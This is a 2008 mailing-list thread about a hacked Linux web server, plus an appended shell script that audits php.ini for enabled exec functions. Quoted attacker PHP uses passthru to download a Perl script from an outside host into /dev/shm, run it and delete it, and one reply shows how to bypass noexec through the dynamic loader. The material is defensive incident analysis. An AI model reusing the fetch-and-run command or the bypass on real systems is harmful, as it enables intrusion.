
Re: ping22: can not kill this process



Hi Luis
    You are absolutely right!!
    Just tried a test script at /tmp, it is running. So there is not
much point in mounting /tmp and /dev/shm as noexec.
    My misunderstanding of non-exec has been there for a while. :(


Thanks a lot.

Mike


On Jan 3, 2008 8:55 PM, Luis Mondesi <lemsx1@gmail.com> wrote:
> On Jan 3, 2008 6:18 PM, Mike Wang <comritesecurity@gmail.com> wrote:
> > Hi folks
> [snip]
> > http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
> >  passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt
> >  > bb.txt;perl bb.txt;rm -f bb.txt*');
> >  passthru('id');
> > ?>
> >
> >  the /tmp was mounted as rw,noexec,nosuid, so it cannot run.
>
> nope. See below.
>
> >  but not the /dev/shm, so the hacked script downloaded to /dev/shm, and ran
> > from there.
> >
> >  What kind of applications are using /dev/shm? I googled around, but did not find
> > much information.
> > Right now I mount it as rw,noexec,nosuid.
>
> A lot of stuff does. /dev/shm is recommended by LSB if I'm not
> mistaken. I know a few apps that use this (including my own).
>
> Well done tracking this script kiddie.
>
> This is a very stupid hack.
>
> By the way, noexec doesn't buy you anything here. perl bb.txt
> should've worked no matter if /tmp is exec or not. The way I see it
> they both worked (/tmp and /dev/shm). And besides, noexec can't even
> stop executables anyway. That's the stupidest of flags for mount:
>
> $> /lib/ld-linux.so.2 /usr/bin/printf "%s\n" foo
> foo
>
> And don't even think of making /lib/ld-linux.so.2 non exec or
> something else... Your system will just break in a million pieces ;-)
>
> It's time to tell PHP (via php.ini) not to allow any of those
> functions that allow executing stuff from the system (system,
> passthru, whatever).
>
> Also, you might want to consider using Virtual Servers (Linux VServer,
> Xen, vmware, etc).
>
> Hack me once, shame on you. Hack me any other time with the same
> stupid attack vector, shame on me.
>
> Good that you took time to report this.
>
>
> --
> ----)(-----
> Luis Mondesi
> Maestro Debiano
>
> ----- START ENCRYPTED BLOCK (Triple-ROT13) ------
> Gur Hohagh [Yvahk] qvfgevohgvba oevatf gur fcvevg bs Hohagh gb gur
> fbsgjner jbeyq.
> ----- END ENCRYPTED BLOCK (Triple-ROT13) ------
>



-- 
Best Regards

Mike
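Luis's concrete recommendation is to stop PHP from spawning system commands through php.ini rather than relying on noexec mounts. The script below is an added example, not code from this thread: it audits a php.ini and reports which of PHP's shell-spawning functions (system, passthru, exec, shell_exec, popen, proc_open, all real PHP builtins) are still missing from `disable_functions`. The sample php.ini it writes is constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the thread): check which shell-spawning PHP
# functions a php.ini leaves enabled. Run as: sh audit.sh /path/to/php.ini

# PHP builtins that hand a string to a shell or spawn a child process.
EXEC_FUNCTIONS="system passthru exec shell_exec popen proc_open"

# Print, one per line, the names in EXEC_FUNCTIONS that the given php.ini
# does NOT list in disable_functions. Empty output means all are disabled.
missing_exec_functions() {
    ini_file="$1"
    # Take the value of the last uncommented disable_functions line (PHP
    # honours the last one) and turn the comma-separated list into spaces.
    disabled=$(sed -n 's/^[[:space:]]*disable_functions[[:space:]]*=[[:space:]]*//p' "$ini_file" \
               | tail -n 1 | tr ',' ' ')
    for fn in $EXEC_FUNCTIONS; do
        case " $disabled " in
            *" $fn "*) ;;                 # listed in disable_functions: fine
            *) printf '%s\n' "$fn" ;;     # still callable from PHP scripts
        esac
    done
}

# Write a constructed php.ini that disables only two of the functions,
# the kind of partial hardening the audit is meant to catch.
write_sample_ini() {
    cat > "$1" <<'EOF'
; constructed sample php.ini for the demo
expose_php = Off
disable_functions = system,passthru
EOF
}

# Demo: audit the file given on the command line, if any.
if [ $# -gt 0 ]; then
    missing_exec_functions "$1"
fi
```

A clean result is an empty list; anything printed is a function the webshell quoted above could still have used.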

